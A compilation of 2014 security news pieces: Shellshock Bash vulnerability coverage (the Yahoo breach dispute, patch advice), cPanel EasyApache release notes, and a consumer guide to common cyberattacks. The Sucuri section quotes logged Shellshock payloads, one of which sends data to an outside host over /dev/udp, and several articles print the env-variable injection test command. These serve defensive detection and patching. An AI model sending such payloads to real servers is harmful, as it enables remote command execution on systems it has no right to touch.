Hackers Exploit Shellshock Vulnerability to Gain Access to Yahoo Servers

Romanian hackers have exploited the Shellshock vulnerability to gain access to Yahoo servers, according to Jonathan Hall of security consulting company Future South Technologies. Hall announced the hack of Yahoo, as well as Lycos and WinZip, on the Future South blog after informing the companies and the FBI.

According to a series of blog posts, Hall discovered the vulnerabilities on Saturday night, and watched overnight as the exploit expanded. Hall claims he began attempting to alert Yahoo before 5 am CST, but that it, like the other two companies, was slow to respond.

WinZip confirmed to Hall that they were hacked, while Lycos initially denied that it had been breached, and subsequently admitted the need for further testing. Yahoo confirmed that it had been breached midday on Sunday, and on Monday Yahoo CISO Alex Stamos posted a response to the incident to Hacker News.

“Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock,” Stamos said. “Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users’ data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.”

Stamos also responded to allegations by Hall that Yahoo had been slow to react to the breach, saying that the affected systems had been isolated and the investigation begun within an hour of the email Hall addressed to CEO Marissa Mayer.

Hall in turn responded to Stamos, at first accusing him of giving misleading information, and then trashing Stamos’ explanation for how the breach really occurred.

“I’m not saying for a fact that more than what they are saying was compromised was,” said Hall. “But what I am saying for a fact is that there’s no way in hell they can be certain when they can’t even honestly provide a technical explanation of how the breach occurred in the first place.”

The Independent notes Yahoo’s reputation for under appreciating bug bounty hunters. Yahoo gave a $25 voucher to an ethical hacker who disclosed three bugs in Yahoo servers last year.

by Chris Burt on October 7, 2014

Hackers thrash Bash Shellshock bug: World races to cover hole

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.

But as “millions” of servers, PCs and devices lay vulnerable or are being updated, it’s emerged the fix is incomplete.

The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – including Apple’s OS X.

It allows miscreants to remotely execute arbitrary code on systems ranging from web servers, routers, servers and Macs to various embedded devices that use Bash, and anything else that uses the flawed open-source shell.

An attacker needs to inject his or her payload of code into the environment variables of a running process – and this is surprisingly easy to do, via Apache CGI scripts, DHCP options, OpenSSH and so on. When that process or its children invoke Bash, the code is picked up and executed.

The Bash flaw – designated CVE-2014-6271 – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk.

Patches released on Wednesday by Linux vendors, the upstream maintainer of Bash, and others for OS X, blocked these early attacks, but it’s understood they do not completely protect Bash from code injection via environment variables.

New packages of Bash were rolled out on the same day, but further investigation made it clear that the patched version is still exploitable, and at the very least can be crashed due to a null-pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

Red Hat, at time of writing, is urging people to upgrade to the version of Bash that fixes the first reported security hole, and not wait for the patch that fixes the secondary lingering vulnerability – designated CVE-2014-7169.

“CVE-2014-7169 is a less severe issue and patches for it are being worked on,” the Linux maker said.

Meanwhile, although Ubuntu and other Debian-based distros have moved to using the non-vulnerable Dash over Bash, the latter may well be present or in use by user accounts. Above all, check what shell interpreters are installed, who is using them, and patch CVE-2014-6271 immediately.

By John Leyden, 25 Sep 2014

Bash Vulnerability – Shell Shock – Thousands of cPanel Sites are High Risk

The team behind the Bash project (the most common shell used on Linux) recently issued a patch for a serious vulnerability that could allow for remote command execution on servers running the vulnerable bash versions.

Wait, remote command execution on bash? You are likely asking yourself, “How can someone remotely execute commands on a local shell?”

The issue starts with mod_cgi and how web servers interact with CGI programs (that could be written in Perl, PHP, Shell scripting or any other language). The web server passes (environment) user variables to them so they can do their work. In simple terms, this vulnerability allows an attacker to pass a command as a variable that gets executed by bash.

It means that if you are using mod_cgi on your webserver and you have a CGI written in shell script, you are in deep trouble. Drop everything now and patch your servers.

If you have CGI’s written on any other language, but you are using “system()”, “(backticks)” or executing any commands from the CGI, you are in deep trouble. Drop everything now and patch your servers.

If you don’t know what you have, Drop everything now and patch your servers.

Who is vulnerable?

Almost every server in the Internet is vulnerable to it (every server has Bash). But not all sites are actually exploitable.

I mean, who really still uses mod_cgi instead of mod_php/fast_cgi that would be safe? Or who would write a CGI in shell scripting?

cPanel users at Risk

Well, turns out cPanel does that for some of their internal tools.

As we started to scan our clients sites (and the Internet as a whole) we found that about 2.9% of all sites we scanned were vulnerable to this problem. All of them were running cPanel and had these 2 files available:
/cgi-sys/entropysearch.cgi
/cgi-sys/FormMail-clone.cgi

When we talk about millions of websites online, 2.9% is a lot. Just from our investigation, we found thousands of websites vulnerable and easily compromised.

If you are using cPanel, you have to patch your servers right away (or remove these files from the server)!

For Sucuri clients, sites behind our Website Firewall / WAF are already protected against it.

But we still recommend patching.

Attacks in the Wild

We are seeing many scans for this vulnerability in the wild, but mostly coming from security researchers trying to understand the severity of it (nothing really bad yet). So far, these two IP addresses (166.78.61.142, 24.251.197.244) are hitting every site they can, trying to trigger the vulnerability

166.78.61.142 – – [25/Sep/2014:06:28:47 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444″

24.251.197.244 – – [25/Sep/2014:07:49:36 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :; }; echo -e x22Content-Type: text/plainx5Cnx22; echo qQQQQQq”

We have not detected any massive scans looking for real CGI that would be vulnerable (that’s where the problem lies).

Even if you are using mod_php for your web application (like WordPress or Joomla), you have to make sure that mod_cgi is not enabled for things like your cpanel backend or Plesk or any other management tool.

In a few more days we will see real scans and actual attacks attempting to exploit this Shell Shock vulnerability.

NIX System Administrators

You’re in luck with this one, identifying if you’re vulnerable is easier than previous vulnerabilities. Log into your server and via terminal run this command:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’

If you are vulnerable it will return:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’
vulnerable
hello

To fix it will depend on your NIX distribution but you will want to reinstall or update, which ever you prefer:
#sudo apt-get install bash

– or –

#sudo yum update bash

Once complete, rerun the test and you will get:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
hello

By Daniel Cid on September 25, 2014

Bug in Bash shell creates big security hole on anything with *nix in it

UPDATE, 9/25: The Bash vulnerability, now dubbed by some as “Shellshock,” has been reportedly found in use by an active exploit against Web servers. Additionally, the initial patch for the vulnerability was incomplete and still allows for attacks to succeed, according to a new CERT alert. See Ars’ latest report for further details, our initial report is below.

A security vulnerability in the GNU Bourne Again Shell (Bash), the command-line shell used in many Linux and Unix operating systems, could leave systems running those operating systems open to exploitation by specially crafted attacks. “This issue is especially dangerous as there are many possible ways Bash can be called by an application,” a Red Hat security advisory warned.

The bug, discovered by Stephane Schazelas, is related to how Bash processes environmental variables passed by the operating system or by a program calling a Bash-based script. If Bash has been configured as the default system shell, it can be used by network–based attackers against servers and other Unix and Linux devices via Web requests, secure shell, telnet sessions, or other programs that use Bash to execute scripts.

Because of its wide distribution, the vulnerability could be as wide-ranging as the Heartbleed bug, though it may not be nearly as dangerous. The vulnerability affects versions 1.14 through 4.3 of GNU Bash. Patches have been issued by many of the major Linux distribution vendors for affected versions, including:
•Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
•CentOS (versions 5 through 7)
•Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
•Debian

A test on Mac OS X 10.9.4 (“Mavericks”) by Ars showed that it also has a vulnerable version of Bash. Apple has not yet patched Bash, though it just issued an update to “command line tools.”

While Bash is often thought of just as a local shell, it is also frequently used by Apache servers to execute CGI scripts for dynamic content (through mod_cgi and mod_cgid). A crafted web request targeting a vulnerable CGI application could launch code on the server. Similar attacks are possible via OpenSSH, which could allow even restricted secure shell sessions to bypass controls and execute code on the server. And a malicious DHCP server set up on a network or running as part of an “evil” wireless access point could execute code on some Linux systems using the Dynamic Host Configuration Protocol client (dhclient) when they connect.

There are other services that run on Linux and Unix systems, such as the CUPS printing system, that are similarly dependent on Bash that could be vulnerable.

There is an easy test to determine if a Linux or Unix system is vulnerable. To check your system, from a command line, type:
env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”

If the system is vulnerable, the output will be:
vulnerable
this is a test

An unaffected (or patched) system will output:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
this is a test

The fix is an update to a patched version of the Bash shell. To be safe, administrators should do a blanket update of their versions of Bash in any case.

Sean Gallagher / Sean is Ars Technica’s IT Editor. A former Navy officer, systems administrator, and network systems integrator with 20 years of IT journalism experience, he lives and works in Baltimore, Maryland.
@thepacketrat on Twitter

EasyApache to Install Apache 2.4 in Basic Profile – 60 Day Notice

In approximately 60 days, the Basic profile in EasyApache will build Apache 2.4 by default. This change will not alter existing EasyApache profiles that build Apache 2.2. If you plan to update from an existing Apache 2.2 installation to Apache 2.4, we strongly recommend that you build in a test environment before you migrate Apache versions on a production server.

Review the following links for more information on the differences between Apache 2.2 and 2.4:

http://documentation.cpanel.net/display/EA/Critical+Changes+In+Apache+2.4

http://httpd.apache.org/docs/trunk/upgrading.html

cPanel EasyApache 3.26.8 Released

cPanel, Inc. has released EasyApache 3.26.8 with Curl version 7.38. This release addresses vulnerabilities related to CVE-2014-3613 and CVE-2014-3620.

AFFECTED VERSIONS
All versions of Curl 7.1 through 7.37.1

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-3613 – MEDIUM

Curl 7.38
Fixed bug in libcurl related to CVE-2014-0118.

CVE-2014-3620 – MEDIUM

Curl 7.38
Fixed bug in libcurl related to CVE-2014-0231.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.8 with an updated version of Curl to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest version of Curl.

REFERENCES
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3613
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3620
http://curl.haxx.se/docs/security.html#20140910A

cPanel EasyApache 3.26.7 Released

cPanel, Inc. has released EasyApache 3.26.7 with Apache version 2.2.29. This release addresses vulnerabilities CVE-2014-0118, CVE-2014-0231, CVE-2014-0226 and CVE-2013-5704. We encourage all Apache 2.2 users to upgrade to Apache version 2.2.29.

AFFECTED VERSIONS
All versions of Apache 2.2 before version 2.2.29.

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-0118 – MEDIUM

Apache 2.2.29
Fixed bug in the Deflate module related to CVE-2014-0118.

CVE-2014-0231 – MEDIUM

Apache 2.2.29
Fixed bug in the CGID module related to CVE-2014-0231.

CVE-2014-0226 – MEDIUM

Apache 2.2.29
Fixed a race condition related to CVE-2014-0226.

CVE-2013-5704 – MEDIUM

Apache 2.2.29
Fixed a bug in the Headers module related to CVE-2013-5704.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.7 with an updated version of Apache 2.2 to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest version of Apache.

REFERENCES
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0118
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0231
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0226
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5704
http://apache.cs.utah.edu//httpd/CHANGES_2.2.29

cPanel & WHM 11.44 Now in STABLE Tier

cPanel, Inc. is thrilled to release cPanel & WHM software version 11.44, which will soon be available in the STABLE tier.

cPanel & WHM 11.44 offers a transfer and restore renovation, configuration clusters, a new edition of Paper Lantern, support access, and more.

Transfer & Restore Renovation
From simple log files and reports to a continuous transfer and restore process, a series of changes to transfer and restore functionality brings widespread benefits.

Configuration Clusters
cPanel & WHM now offers configuration clustering to streamline the process of updating multiple servers, adding a powerful boost in efficiency.

Paper Lantern
With a more agile, consistent framework, Paper Lantern for cPanel & WHM 11.44 signifies progress towards user interface perfection and stunning, user-created themes.

Support Access
Grant cPanel Support Access enables customers to quickly grant server access to cPanel support staff, therefore speeding up the resolution of issues with just a few mouse clicks.

Detailed information on all cPanel & WHM 11.44 features can be found at https://documentation.cpanel.net. An overview of the latest features and benefits is also available at http://releases.cpanel.net.

EasyApache 3.26.3 Released

cPanel, Inc. has released EasyApache 3.26.3 with PHP version 5.5.15, Libxslt version 1.1.28 and Libxml2 version 2.9.1. This release addresses PHP vulnerability CVE-2014-4670 by fixing a bug in the SPL component, CVE-2012-6139 by fixing a bug in Libxslt, and fixes bugs in Libxml2 to address the following CVEs: CVE-2012-5134, CVE-2013-0338, CVE-2013-0339, CVE-2013-1969, and CVE-2013-2877. We encourage all PHP 5.5 users to upgrade to PHP version 5.5.15, and all users to upgrade to Libxslt version 1.1.28 and Libxml2 version 2.9.1.

AFFECTED VERSIONS
All versions of PHP 5.5 before 5.5.15.
All versions of Libxslt before 1.1.28.
All versions of Libxml2 before 2.9.1.

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-4670 – MEDIUM

PHP 5.5.15
Fixed a bug in the SPL component related to CVE-2014-4670.

CVE-2012-6139 – MEDIUM

Libxslt 1.1.28
Fixed a bug in the Libxslt library related to CVE-2012-6139.

CVE-2012-5134 – MEDIUM

Libxml2 2.9.1
Fixed an out of bound access bug in the Libxml2 library related to CVE-2012-5134.

CVE-2013-0338 – MEDIUM

Libxml2 2.9.1
Fixed a bug in the Libxml2 library related to CVE-2013-0338.

CVE-2013-0339 – MEDIUM

Libxml2 2.9.1
Fixed a bug in the Libxml2 library related to CVE-2013-0339.

CVE-2013-1969 – HIGH

Libxml2 2.9.1
Fixed buffer conversion bugs related to CVE-2013-1969.

CVE-2013-2877 – MEDIUM

Libxml2 2.9.1
Fixed a bug in the Libxml2 library related to CVE-2013-2877.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.3 with updated versions of PHP 5.5, Libxslt and Libxml2 to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest versions of PHP, Libxslt and Libxml2.

REFERENCES
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4670
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6139
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5134
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0338
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0339
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1969
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2877
http://php.net/ChangeLog-5.php#5.5.15
http://xmlsoft.org/ChangeLog.html
http://xmlsoft.org/Libxslt/ChangeLog.html

Beware of These 4 Common and Dangerous Cyberattacks

Last week Google unveiled Project Zero, a new team dedicated to making Internet users less vulnerable to cyberattacks. From Heartbleed to Cryptolocker, the headlines are increasingly full of news about scary new threats that target the average Internet user.

“You know to delete that email that tells you you’ve won the lottery, so attackers have to change their approach over time,” Chris Weber, the co-founder of Casaba Security, told NBC News. “But really, these are new spins on old kinds of attacks.”

Here are four common and dangerous types of cyberattacks to watch out for — and how to avoid or fix them.

Ransomware

What it looks like: Ransomware falls under the large cyberattack umbrella of “malware” –- malicious software — and it’s a particularly scary brand. It locks up a victim’s computer files and demands payment in exchange for unlocking them.

Internet Danger: What Is Ransomware?

Victims of ransomware usually see a pop-up warning that overtakes the device’s screen, blocking access and encrypting files. The message demands the victim pay hundreds of dollars to unlock the files and regain access to the computer.

What to do: While it’s tempting to pay the ransom, security experts say that’s a bad idea: There’s no guarantee the crooks will actually free the files, and funding criminal activity only fuels it.

Ransomware victims can try to remove the malicious program themselves using anti-virus software, or take the infected device to a computer repair shop. If the ransomware can be removed, sometimes that’s all that’s needed: if the files weren’t actually encrypted, they would be accessible again. But if the files were indeed encrypted as threatened, removing the ransomware won’t change that.

“Unfortunately this is one of those cases when if your data has been encrypted, there’s just nothing you can really do,” Kevin Johnson, the CEO of cybersecurity consultancy Secure Ideas.

As with most malware, ransomware is often unwittingly downloaded when users open email attachments or click on links, so as always caution is advised.

Sketchy video sites that ask you to install a “codec” or update

What it is: Didn’t feel like paying to stream that new movie, eh? It can be tempting to watch it for “free” on a website that streams pirated video, but these disreputable sites are sometimes filled with potential cyberattacks.

In this type of attack, victims click what looks like a regular video player in an attempt to stream the content. But then a message pops up telling the user to install a “codec” or other kind of update in order to view the video. Victims who download the so-called update are actually installing malware on their own computers.

What to do: Be wary of any message that pushes you to download something in order to view a video. And it’s not only sketchy “free video” sites: spammy viral video clips that make their way around Facebook could also be malicious. (One of the exceptions is Netflix, which uses Microsoft Silverlight to stream video.)

“You really have very few reasons to have to install anything to watch content on the Internet,” Dave Aitel, the CEO of security firm Immunity Inc., told NBC News. “But people say, ‘I really want to watch that show, so I’ll click until the clip starts playing.'”

Malicious links in messaging apps and social networks

What it is: This threat is perhaps the most similar to attack methods that have been around a while. That old spam email that contains a malicious link or attachment isn’t dead; it has simply moved to networks where people are active, and where they think they can trust a network of friends.

“We know to be more careful about email, but getting infected now isn’t like it used to be,” Raj Samani, the chief technology officer for McAfee’s EMEA region, told NBC News. “It could be a link in a LinkedIn connection request that looks legitimate, or a Twitter direct message that is supposedly from a friend.”

On a mobile device,the malicious software could harvest contact information, secretly send calls and send texts to premium numbers and track a user’s location, for example.

What to do: Beyond the standard advice to avoid clicking on suspect links and files, Samani suggests mobile phone users install anti-virus programs that could catch the threats.

“Anti-virus is standard for most people on their desktop or laptop, but how many people do you know have it installed on mobile?” Samani said. His employer — McAfee — offers a free version of mobile anti-virus, as do companies such as Avast.



Fake Flappy Bird (and other popular apps)

What it is: The addictively simple (and temporarily pulled) mobile game Flappy Bird is lots of fun — but the hundreds of malicious clone apps lurking in app stores are quite the opposite.

“When an app gets even halfway popular — much less something as viral as Flappy Bird — app stores get so flooded that it’s hard to find the legitimate one,” Aitel said.

In Flappy Bird’s case, a report released last month from anti-virus company McAfee said hundreds of clones emerged in the first quarter of 2014 (after the legitimate app’s creator took it down). McAfee tested 300 of the clones and found that almost 80 percent of them contained malware.

Once downloaded, those malicious clones did very bad things with the victims’ phones, and in the worst cases, the malware gained full control of the infected device.

What to do: Carefully check before downloading an app from an app store: Check the creator’s name, the app’s description and the reviews among other information. Avoid giving any app sweeping permission to access parts of the phone, as tempting as it is to simply keep clicking “yes.” As with the previous threat, mobile anti-virus software can help mitigate or avoid the damage.

By Julianne Pepitone